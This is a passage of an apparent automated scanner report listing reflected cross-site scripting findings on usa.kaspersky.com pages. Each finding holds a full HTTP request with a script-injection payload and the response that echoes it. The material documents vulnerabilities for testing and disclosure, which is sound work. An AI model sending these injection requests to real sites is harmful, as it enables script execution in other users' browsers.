Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139033"
Content-Type: text/html; charset=utf-8
Content-Length: 35810
Date: Sun, 04 Sep 2011 12:24:01 GMT
X-Varnish: 1163052725
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf53d42"><script>alert(1)</script>5b132f4cd0b" />
...[SNIP]...

1.233. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2741c"-alert(1)-"a6f7a31d0f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf2741c"-alert(1)-"a6f7a31d0f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139022"
Content-Type: text/html; charset=utf-8
Content-Length: 32273
Date: Sun, 04 Sep 2011 12:23:47 GMT
X-Varnish: 1163052278
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
e;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf2741c"-alert(1)-"a6f7a31d0f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.234. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1723a"><script>alert(1)</script>ee20143fcdf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf1723a"><script>alert(1)</script>ee20143fcdf HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138995"
Content-Type: text/html; charset=utf-8
Content-Length: 34722
Date: Sun, 04 Sep 2011 12:23:25 GMT
X-Varnish: 1163051651
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf1723a"><script>alert(1)</script>ee20143fcdf" />
...[SNIP]...

1.235. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_28.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df53f"><script>alert(1)</script>f69aee4597f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 14:04:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315145073"
Content-Type: text/html; charset=utf-8
Content-Length: 32422
Date: Sun, 04 Sep 2011 14:04:40 GMT
X-Varnish: 1163242244
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f" />
...[SNIP]...

1.236. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_28.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 995ee"-alert(1)-"4c55e7351ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/js_injector_28.js995ee"-alert(1)-"4c55e7351ad HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 14:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315145114"
Content-Type: text/html; charset=utf-8
Content-Length: 36855
Date: Sun, 04 Sep 2011 14:05:20 GMT
X-Varnish: 1163243798
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ame = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.js995ee"-alert(1)-"4c55e7351ad";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.237. http://usa.kaspersky.com/store/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12019"-alert(1)-"cc53a18bcad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store12019"-alert(1)-"cc53a18bcad/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:26 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145426"
Content-Type: text/html; charset=utf-8
Content-Length: 30578
Date: Sun, 04 Sep 2011 14:10:52 GMT
X-Varnish: 1163255414
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/store12019"-alert(1)-"cc53a18bcad/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.238. http://usa.kaspersky.com/store/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c3d"><script>alert(1)</script>728d01007db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store61c3d"><script>alert(1)</script>728d01007db/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145373"
Content-Type: text/html; charset=utf-8
Content-Length: 32145
Date: Sun, 04 Sep 2011 14:09:44 GMT
X-Varnish: 1163253667
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store61c3d"><script>alert(1)</script>728d01007db/index.html" />
...[SNIP]...

1.239. http://usa.kaspersky.com/store/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1823e"-alert(1)-"c57b3ddd40c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store/index.html1823e"-alert(1)-"c57b3ddd40c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145516"
Content-Type: text/html; charset=utf-8
Content-Length: 34687
Date: Sun, 04 Sep 2011 14:12:04 GMT
X-Varnish: 1163258683
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/store/index.html1823e"-alert(1)-"c57b3ddd40c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.240. http://usa.kaspersky.com/store/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a44b"><script>alert(1)</script>45b650893da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/index.html2a44b"><script>alert(1)</script>45b650893da HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:12 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145472"
Content-Type: text/html; charset=utf-8
Content-Length: 32160
Date: Sun, 04 Sep 2011 14:11:22 GMT
X-Varnish: 1163257039
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/index.html2a44b"><script>alert(1)</script>45b650893da" />
...[SNIP]...

1.241. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78669"><script>alert(1)</script>5799514c24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/index.html?78669"><script>alert(1)</script>5799514c24=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:06:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145195"
Content-Type: text/html; charset=utf-8
Content-Length: 36422
Date: Sun, 04 Sep 2011 14:06:38 GMT
X-Varnish: 1163246711
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/index.html?78669"><script>alert(1)</script>5799514c24=1" />
...[SNIP]...

1.242. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 851c8"-alert(1)-"81aae218061 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store/index.html?851c8"-alert(1)-"81aae218061=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145230"
Content-Type: text/html; charset=utf-8
Content-Length: 36346
Date: Sun, 04 Sep 2011 14:07:21 GMT
X-Varnish: 1163247822
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/store/index.html?851c8"-alert(1)-"81aae218061=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.243. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5e1"-alert(1)-"88d38e569d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /storece5e1"-alert(1)-"88d38e569d1/kaspersky-store HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:22 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141042"
Content-Type: text/html; charset=utf-8
Content-Length: 37855
Date: Sun, 04 Sep 2011 12:57:35 GMT
X-Varnish: 1163106372
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/storece5e1"-alert(1)-"88d38e569d1/kaspersky-store";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.244. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 868bb"><script>alert(1)</script>8dbb397d3f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store868bb"><script>alert(1)</script>8dbb397d3f0/kaspersky-store HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:56:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141019"
Content-Type: text/html; charset=utf-8
Content-Length: 33558
Date: Sun, 04 Sep 2011 12:57:06 GMT
X-Varnish: 1163105712
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store868bb"><script>alert(1)</script>8dbb397d3f0/kaspersky-store" />
...[SNIP]...

1.245. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9679a"-alert(1)-"544c51625ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store/kaspersky-store9679a"-alert(1)-"544c51625ef HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:00:18 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141218"
Content-Type: text/html; charset=utf-8
Content-Length: 37855
Date: Sun, 04 Sep 2011 13:00:30 GMT
X-Varnish: 1163111969
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/store/kaspersky-store9679a"-alert(1)-"544c51625ef";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.246. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d2f"><script>alert(1)</script>76c18672a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/kaspersky-storef3d2f"><script>alert(1)</script>76c18672a5 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
